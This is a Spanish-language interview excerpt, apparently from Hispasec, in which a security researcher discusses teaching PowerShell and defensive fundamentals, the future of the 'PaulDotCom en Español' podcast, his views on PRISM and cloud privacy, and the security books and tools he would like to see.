PowerShell es algo en lo que llevaba trabajando hace años pero no lo hablaba mucho. Cuando empecé a dar clases me di cuenta de cuanto hijo de vecino estaba entrenando gente en como romper cosas, en Metasploit, etc. pero veía muy poco en los fundamentos, y aun peor veía gente que sabia mucho de Linux haciendo pentests de Windows y no tenían ni idea de como asegurar, defender y monitorizar el entorno que estaban evaluando! Saben mil trucos para meterse pero nada de como se opera, como afecta el negocio, nada de lo básico y lo peor con una mentalidad cerrada de "X es superior". Las plataformas son herramientas y las herramientas no son personas para amar o querer, no se le puede poner sentimiento a las mismas, sino aprender de todas ellas y dar lo mejor a los clientes en un servicio profesional como es debido. En lo personal no se puede tener ego, si soy bueno en algo siempre habrá alguien que sepa más de lo mismo y siempre se debe estar buscando el avanzar y no quedarse cómodo en una sola cosa porque todos los entornos son multidisciplinarios hoy en día.

P: Más de dos años con "PaulDotCom en Español". ¿Qué ha significado para ti este tiempo? ¿Tienes planes para el podcast?

http://pauldotcom.com/wiki/index.php/PaulDotCom_Espanol
R: Sobre el Podcast, Paul me pidió que tomase control del mismo por completo, ya que siente que no lo apoya mucho más allá del nombre de PaulDotCom. Por eso mismo me encuentro planeando con amistades moverlo a uno con nombre nuevo, con más personas que yo mismo y evolucionarlo, por lo cual te diré que vienen cosas nuevas pronto. En términos de tiempo consume, ya estoy dándome cuenta que al ser padre, esposo, mi trabajo diario como Director de un grupo de investigación, mis proyectos y clases, me estoy quemando mentalmente más rápido que antes.

P: PRISM, ¿Qué opinión te merece?

R: Es a la luz pública lo que muchos ya sabíamos y sospechábamos. Lo que me sorprende es la incredulidad de las personas, estás usando servicios en la nube que se rigen primero por su responsabilidad a los dueños de acciones y después a las leyes locales donde se encuentran. Estás cediendo el control de tu información. Los emails siempre han sido abiertos, los ISP siempre ven lo que haces, no es nuevo. Lo nuevo es como la gente confía ciegamente más y más en estos servicios de nube y compañías sin una evaluación sincera. Todos los países espían, todos de un nivel a otro, por eso no ves mucho ruido de otros países. Lo que asusta es la retención de esta información y como puede ser minada en el futuro. Aún asusta más el que no haya sido mucha la indignación, fuera del sensacionalismo que se le ha dado en las noticias. En pocas palabras, los terroristas ganaron. Querían una sociedad con miedo y atacar las libertades de la misma y lo lograron, porque muchos ahora aceptan esta invasión de la privacidad y las libertades, que en el futuro es casi seguro serán abusadas según se siguen quitando controles.

P: ¿Que libro y que herramienta echas de menos y que aún nadie ha escrito?

R: Te soy sincero, cuando no encuentro una herramienta trato de crearla. En términos de libros me gustaría ver series sólidas en los fundamentos, no solo en herramientas específicas.



Laboratorio Hispasec